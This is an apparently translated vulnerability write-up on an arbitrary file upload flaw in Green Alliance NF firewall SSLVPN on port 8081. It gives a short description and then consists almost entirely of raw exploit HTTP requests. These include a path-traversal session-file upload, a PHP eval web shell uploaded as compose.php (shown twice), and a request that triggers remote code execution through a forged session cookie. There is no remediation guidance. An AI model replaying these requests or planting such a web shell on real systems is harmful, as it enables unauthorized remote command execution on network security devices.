Green Alliance Nf Next Generation Firewall Any File Upload Vulnerability
Green Alliance Nf Next Generation Firewall Any File Upload Vulnerability
Green Alliance NF next-generation firewall any file upload vulnerability
Vulnerability Description
Green Alliance SSLVPN has a vulnerability to upload any file. The attacker can obtain server permissions by sending special request packets and perform remote command execution.
Vulnerability Impact
Green Alliance SSLVPN
Network surveying and mapping
Vulnerability reappears
Main page
The port with the vulnerability is 8081
1
2
3
4
5
6
7
8
9
10
POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9
Host:
--1d52ba2a11ad8a915eddab1a0e85acd9
Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac71"
lang|s:52:"../../../../../../../../../../../../../../../../tmp/";
--1d52ba2a11ad8a915eddab1a0e85acd9--
1
2
3
4
5
6
7
8
9
10
11
POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
Host:
--4803b59d015026999b45993b1245f0ef
Content-Disposition: form-data; name="file"; filename="compose.php"
<?php eval($_POST['cmd']);?>
--4803b59d015026999b45993b1245f0ef--
1
2
3
4
5
6
7
8
9
10
11
POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
Host:
--4803b59d015026999b45993b1245f0ef
Content-Disposition: form-data; name="file"; filename="compose.php"
<?php eval($_POST['cmd']);?>
--4803b59d015026999b45993b1245f0ef--
1
2
3
4
5
6
POST /mail/include/header_main.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
Host:
cmd=phpinfo();
This post is licensed under CC BY 4.0 by the author.